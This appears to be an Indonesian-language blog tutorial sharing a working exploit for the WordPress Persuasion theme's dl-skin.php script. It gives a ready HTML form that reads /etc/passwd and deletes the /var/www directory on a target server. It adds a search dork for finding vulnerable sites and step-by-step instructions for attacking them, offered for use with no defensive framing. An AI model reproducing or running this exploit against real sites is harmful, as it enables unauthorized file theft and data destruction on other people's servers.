Assalamualaikum , Dan selamat malam buat temen2 yang begadang :)
Kali ini saya akan share yaitu Wordpress Persuasion Theme File Download and File Deletion Exploit,
Oke langsung saja , bahan2 yang dibutuhkan ..
Notepad++ atau juga bisa Menggunakan Notepad atau Wordpad .
Disini saya Menggunakan Notepad++ .
1.Kamu save Exploitnya
<html>
<body>
<form action="http://target/wp-content/themes/persuasion/lib/scripts/dl-skin.php" method="post">
Existing file's name:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
Directory to be removed:<input type="text" name="_mysite_delete_skin_zip" value="/var/www"><font color=red>Use with caution it will delete the files and directories if it is writeable</font><br>
<input type="submit">
</form>
</body>
</html>
2. Sekarang Kamu cari target Dengan Dork
inurl:
/wp-content/themes/persuasion/lib/scripts/dl-skin.php
3. Lalu jika sudah ketemu , Sekarang kamu masukin targetnya ke Exploit , yang sudah saya kasi warna biru :)
Lalu buka File Htm tadi dengan Double Klik , Jika keluar Seperti Ini maka Kamu tinggal Klik Submit Query
Jika Sudah , Entar kamu akan Otomatis download , yaitu File password .
:D ..
Sekarang tergantung dikamu saja mau diapakan :)